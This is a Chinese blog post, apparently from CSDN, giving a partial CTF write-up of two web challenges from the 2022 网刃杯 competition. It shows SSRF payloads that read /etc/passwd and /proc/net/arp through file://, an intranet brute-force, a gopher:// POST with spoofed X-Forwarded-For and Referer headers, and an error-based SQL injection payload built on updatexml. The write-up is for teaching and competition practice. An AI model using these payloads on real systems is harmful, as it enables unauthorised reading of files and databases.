网刃杯部分wp

最新推荐文章于 2022-05-06 21:10:00 发布
最新推荐文章于 2022-05-06 21:10:00 发布
阅读量344 收藏
点赞数
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56059226/article/details/124541389
版权

web

Sign_in

复现地址:http://124.222.24.150:8091/

题目就几行代码

很明显的ssrf,总之看到这几个函数就差不多会想到ssrf

file_get_contents()
fsockopen()
curl_exec()

用file协议看看

?url=file:///etc/passwd

 

读的出来,那直接看看根目录有没有flag,读不出来,那明显要打内网了。

先看看读一下etc/hosts,看到了个内网ip

也可以读路由表?url=file:///proc/net/arp ,一样的,直接访问这个ip没反应,因为是内网嘛,一般情况下子网掩码都是255.255.255.0,其实看路由表也猜的出来。然后直接burp爆破一下最后一段的1-254就好了

有两个长度不一样,访问100有不同的结果

 

随便传一个上去后又叫post传个b

 

那只能用gopher了,用burp构造一个数据包,url编码两次,关于gopher的构造可以看看:(3条消息) gopher协议利用_西部壮仔的博客-CSDN博客_gopherus使用

POST /?a=123 HTTP/1.1
Host: 172.73.23.100
Content-Length: 7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close

b=456

 然后传过去:url=gopher://172.73.23.100:80/_编码的内容,注意要加上端口。

加上X-Forwarded-For:127.0.0.1,又说要 从bolean.club访问才可以,再加上Referer: bolean.club

POST /?a=123 HTTP/1.1
Host: 172.73.23.100
Content-Length: 7
X-Forwarded-For:127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer:bolean.club
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close

b=456

同样编码两次传进去就拿到了

 

upload 

 文件上传题,但题目描述说了是sql,直接想到了文件头注入,随便传一个php文件

要改content-type,改了后返回了个地址

访问

 

直接试一下sql注入

 

 有回显,直接报错注入

1' and updatexml(1,concat(0x7e,(select  database()),0x7e),1));#

 查的出来,后面查表什么的,怎么都弄不出来,也不知道为什么,最后直接猜在flag表里面的flag字段就出来了

就是那么抽象。。 

c1oud..
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2022第二届网刃杯网络安全大赛-Web
web18224617243的博客
05-31 600
2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-师傅原创,禁止抄袭! 一、Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yyds。题目链接见附件,每个链接均可访问,环境5分钟重启一次。 文件上传,随便上传一个马 使用Burp抓包 根据提示,更改类型 上传文件 查询到filename上传点,报错注入,获取FLAG flag{5937a0b90b5966939cccd369291c68aa} 二
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
2022第二届网刃杯网络安全大赛-Re
qq_43264813的博客
04-25 5230
2022第二届网刃杯网络安全大赛-Re 前言 提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一、RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入经过加密之后进行比较,长度看密文得知是28字节,逆向算法发现条件太多,但是发现:加密的相关因素仅仅和铭文本身和他所在flag中的偏移有关系,可以爆破。 加密函数太复杂,直接在汇编层面爆破 先修改一下程序 添加一个跳转,然后进行爆破。 逆向算法得知,数字和特殊字符和位置没有线性关系,所以先把数字
2022第二届网刃杯网络安全大赛
tlovejr的博客
05-06 2980
前言 前段时间在机缘巧合下参加了这次的比赛,距离比赛结束也有一星期的时间,现在把部分题解给大家说一下 一、ICS1-ncsubj 1、首先先打开数据包进行查看,并追踪一下tcp流看看有没有什么收获信息 2、在上图可以看到,有3段被分开的base64编码,那就直接合起来解密 anx1fG58Z3xufGF8cHxmfGh8b3x3fHJ8cHxnfA== j|u|n|g|n|a|p|f|h|o|w|r|p|g| 3、发现上面还是有加密,同事大神说这个其实随波逐流解码,那就直接利用软件
2022网刃杯
姜小孩的博客
05-06 1224
网刃杯2022 2022网刃杯
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
2022年第三届“网鼎杯”网络安全大赛(朱雀组)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀组)部分题目附件
赛博地球杯工业互联网安全大赛wp1
08-03
本文将对赛博地球杯工业互联网安全大赛 WP1 进行详细解析,涵盖网络协议、PHP 和 SQL 等相关知识点。 一、网络协议 在 WP1 中,我们可以看到 ping 命令的使用,ping 命令是一种网络诊断工具,用于测试网络连接是否...
2022第二届网刃杯网络安全大赛题包
04-25
2022第二届网刃杯网络安全大赛题包
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
2022第二届网刃杯网络安全大赛部分wp
3tefanie丶zhou的博客
04-25 3648
【世间痴情男儿,不论地位高低,大抵都是喜欢女子便是错了,而且希望能一辈子知错不改】
网刃杯复现misc+流量包
Demodd的博客
09-14 1852
签到 cipher.txt U2FsdGVkX1+WTSHujcCjvHj/gcwL0C7u37XtW4idGcpci3H913I= U2F那些,考虑为aes,des啥的 发现flag.txt是零宽度字符, md5加密一下文件 f71b6b842d2f0760c3ef74911ffc7fdb 测试发现是rabbit,解密获得flag mspaint 看一下iehistory 发现key.png和百度网盘 volatility -f mspaint.raw --profile=Win7SP1x
2021第一届网刃杯网络安全大赛-baby-usb
qq_43264813的博客
09-13 679
2021第一届网刃杯网络安全大赛-baby-usb 难度系数:4.0 题目描述:黑客捕获到了某台电脑的设备流量,请帮忙分析可疑数据。 解题思路: 查看流量包并分析发现为键盘流量,从互联上找取脚本进行批量爬取键盘流量 将所爬取的流量做为文档密码进行解密 ...
第二届网刃杯CTF-wp
qq_45603443的博客
04-26 815
第二届网刃杯CTF-wpWebez_javaezjsSign_inuploadReez_algorithm定时启动Re_functionfreestyleMisceasyiecTip Web ez_java package me.su; import org.springframework.expression.common.TemplateParserContext; import org.springframework.expression.spel.standard.SpelExpressionPar
2021第一届网刃杯网络安全大赛-签到题
qq_43264813的博客
09-13 1991
2021第一届网刃杯网络安全大赛-签到题 难度系数:3.0 题目描述:welcome!!! 解题思路: 打开文件发现是两个txt文本,将flag文件内容进行提取得到tips为md5(myself) 英文直译就是我本身,也就是说key可能为两个文件的md5校验和 加密字符串疑是DES3或者ribbit加密中的一种,尝试解密拿到flag ...
2021网刃杯CTF ez-sql
iO快到碗里来
09-13 683
0x00 前言 InCTF2021原题:Vuln Drive - InCTF Internationals 2021,这里直接借用其源码。 <?php include('./conf.php'); $inp=$_GET['part1']; $real_inp=$_GET['part2']; if(preg_match('/[a-zA-Z]|\\\|\'|\"/i', $inp)) exit("Correct <!-- Not really -->"); if(preg_match('/\(
陇剑杯线下网络防御wp
最新发布
10-06
陇剑杯线下网络防御wp是一项网络安全竞赛,旨在培养和提升网络安全人才的技术能力和实战经验。该比赛由陇剑网络实验室主办,参赛者需要通过线下实战模拟来解决实际的网络攻防问题。 该比赛的wp,即“Write-up”,是指参赛者解决问题的详细描述和解决方案的记录。陇剑杯线下网络防御wp是参赛者通过分析和解决比赛中遇到的各种问题所编写的一份报告。 在这份报告中,参赛者将详细描述他们分析问题的过程,包括发现问题、理解问题的关键因素和属性,以及提供解决问题的方法和策略等等。此外,参赛者还会展示他们的技术实施步骤和使用的工具,以及解决问题的效果和成果。 陇剑杯线下网络防御wp的目的是让参赛者在比赛结束后,能够总结和分享自己的经验和思路,从而促进知识和经验的传播与交流。同时,通过编写wp,参赛者也能够提高自己的技术文档写作能力和表达能力。 总之,陇剑杯线下网络防御wp是参赛者在比赛后所编写的一份报告,用来详细描述他们的问题解决过程和解决方案,以及展示他们的技术实施步骤和成果。通过编写wp,参赛者能够总结经验、分享技巧,并提高自己的技术文档撰写和表达能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值